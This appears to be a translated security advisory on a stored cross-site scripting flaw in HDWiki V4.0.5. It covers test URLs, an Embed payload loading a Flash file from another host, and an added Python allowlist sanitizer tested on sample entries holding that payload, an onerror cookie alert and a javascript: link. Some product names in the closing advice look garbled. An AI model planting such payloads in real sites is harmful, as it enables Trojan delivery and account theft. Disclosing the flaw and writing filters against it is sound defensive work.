Affected Versions: HDWiki-V4.0.5
Hazard level: High Risk
Vulnerability description: Antiy CERT found during penetration testing that HDWiki-V4.0.5 does not filter HTML elements when an entry is created or edited. Attacker-supplied markup is stored with the entry and rendered to every later visitor, giving persistent (stored) cross-site scripting and a drive-by Trojan delivery point. A user who views an entry that an attacker has modified to carry malicious cross-site code can have sensitive information stolen and the machine infected with a Trojan.
Note: this cross-site vulnerability does not affect the official website of Interactive Encyclopedia (Hudong Baike, the HDWiki vendor).
Test Environment: Windows XP SP2 + IE6.0 & Windows XP SP3 + IE8.0
Test method:
[CERT Warning] The programs (methods) provided on this site may be offensive and are intended only for security research and teaching. Use them at your own risk!
1, URL: http://10.0.6.139/wiki/index.php?doc-view-2
XSS code: [screenshot: http://www.bkjia.com/uploads/allimg/131121/2011033040-0.png]
2, URL: http://10.0.6.139/wiki/index.php?doc-view-3
XSS code: [screenshot: http://www.bkjia.com/uploads/allimg/131121/2011031215-1.png]
3, URL: http://10.0.6.139/wiki/index.php?doc-view-4
XSS code:
<Embed src="http://10.0.54.55/33.swf" AllowScriptAccess="always"></EMBED>
http://10.0.54.55/33.swf is a Flash file. The Flash file uses a function that opens a web page, so as soon as the browser parses the embedded Flash (which AllowScriptAccess="always" lets call script in the page's origin) a web page pops up; here the NetEase 163 site is used as the test target.
Before the jump: [screenshot: http://www.bkjia.com/uploads/allimg/131121/201103H27-2.png]
After the jump: [screenshot: http://www.bkjia.com/uploads/allimg/131121/2011034Y9-3.png]
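The missing control is an allowlist filter on entry bodies before they are stored or rendered. The following is an added example of such a filter, written for this page and not HDWiki's own code: the allowed tag and attribute sets are assumptions for illustration, and the sample entry is constructed to contain the embed payload quoted above plus an inline event handler and a javascript: link. Everything that is not explicitly allowed is dropped and reported, so the same routine doubles as a scanner for already-stored entries.

```python
"""Allowlist HTML sanitizer / scanner for wiki entry bodies (added example, not HDWiki code)."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample entry: benign markup plus the embed payload from the advisory,
# an inline event handler and a javascript: URL.
SAMPLE_ENTRY = (
    '<p>Entry text with a <a href="http://example.org/">link</a>.</p>'
    '<Embed src="http://10.0.54.55/33.swf" AllowScriptAccess="always"></EMBED>'
    '<img src="x" onerror="alert(document.cookie)">'
    '<a href="javascript:alert(1)">click</a>'
)

# Assumed policy: a small set of formatting tags, a few attributes, http(s)/relative URLs only.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "img", "ul", "ol", "li",
                "h2", "h3", "blockquote", "pre", "code"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
SAFE_SCHEMES = {"http", "https", ""}      # "" means a relative URL
VOID_TAGS = {"br", "img"}
RAW_TEXT_TAGS = {"script", "style"}        # their text content is discarded, not escaped


def safe_url(value: str) -> bool:
    """True if the URL scheme is http, https or relative. Control characters and
    whitespace are stripped first because browsers ignore them when parsing a scheme."""
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)
    try:
        return urlsplit(cleaned).scheme.lower() in SAFE_SCHEMES
    except ValueError:
        return False


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitized fragments
        self.dropped = []      # (tag, reason) for every rejected tag/attribute
        self.open_tags = []    # stack of emitted tags, so output is always balanced
        self.in_raw = None     # set while inside <script>/<style>

    def handle_starttag(self, tag, attrs):      # HTMLParser lowercases tag/attr names
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, "tag not in allowlist"))
            if tag in RAW_TEXT_TAGS:
                self.in_raw = tag
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append((tag, f"attribute {name} not allowed"))
                continue
            if name in ("href", "src") and not safe_url(value):
                self.dropped.append((tag, f"unsafe URL scheme in {name}"))
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.in_raw == tag:
            self.in_raw = None
            return
        if tag in self.open_tags:              # close back to the matching open tag
            while True:
                top = self.open_tags.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if self.in_raw is None:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):             # comments dropped (IE conditional comments can carry script)
        pass


def sanitize(fragment: str):
    """Return (clean_html, dropped) where dropped lists every rejected tag or attribute."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    while parser.open_tags:                     # close anything the author left open
        parser.out.append(f"</{parser.open_tags.pop()}>")
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_ENTRY)
    print(clean)
    for tag, reason in dropped:
        print(f"dropped <{tag}>: {reason}")
```

Run against the constructed entry, the embed element is removed outright, the onerror attribute and the javascript: href are stripped, and the harmless paragraph, link and image survive. The decision is made on the tag allowlist, not on the SWF URL, so an http:// Flash source on an attacker's host is rejected regardless of where it points; a denylist of known-bad tags would have to be kept current for every new vector, which is why the allowlist shape is preferred.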
If the NetEase 163 URL that the Flash opens is replaced with a link to malicious content, the user's computer is infected with a Trojan as soon as the Flash is triggered, and attackers can use the vulnerability to steal instant-messaging, online-banking and online-gaming accounts and other information, which poses a serious risk to ordinary Internet users.
CERT lab suggestions:
Until the vendor releases a patch, the CERT lab security experts offer the following suggestions:
1. Install the CERT defense line to guard against the growing number of Trojans and viruses. After installing anti-virus software, enable its real-time virus monitoring, update it frequently and report problems, so that the computer stays protected.
2. The CERT anti-virus emergency response center updates its virus database promptly. Individual users can use Cert 2009 or reica to block the Trojan web page threats that such vulnerabilities cause, and to detect and remove viruses downloaded from Trojan web pages. Cert users should keep Cert's defense line and ruijia up to date to secure their computers against virus intrusion.